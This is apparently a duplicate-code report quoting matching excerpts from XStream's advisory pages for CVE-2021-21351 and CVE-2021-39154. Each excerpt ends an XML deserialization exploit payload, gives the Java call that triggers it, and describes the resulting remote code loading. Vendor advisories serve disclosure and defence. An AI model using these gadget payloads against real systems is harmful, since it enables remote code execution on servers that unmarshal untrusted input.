xstream-distribution/src/content/CVE-2021-21351.html [102:130]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
</pre></div>
<div class="Source Java"><pre>XStream xstream = new XStream();
xstream.fromXML(xml);
</pre></div>

    <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when
    another element is added to the set.</p>

    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>

    <h2 id="impact">Impact</h2>

	<p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
	manipulating the processed input stream.</p>

    <h2 id="workarounds">Workarounds</h2>

    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>

    <h2 id="credits">Credits</h2>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



xstream-distribution/src/content/CVE-2021-39154.html [87:115]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    &lt;/value&gt;
  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
    &lt;type&gt;ysomap&lt;/type&gt;
    &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt;
      &lt;m__obj class='string'&gt;test&lt;/m__obj&gt;
    &lt;/value&gt;
  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
&lt;/sorted-set&gt;
</pre></div>
<div class="Source Java"><pre>XStream xstream = new XStream();
xstream.fromXML(xml);
</pre></div>

    <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when
    another element is added to the set.</p>

    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>

    <h2 id="impact">Impact</h2>

	<p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
	manipulating the processed input stream.</p>

    <h2 id="workarounds">Workarounds</h2>

    <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>

    <h2 id="credits">Credits</h2>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -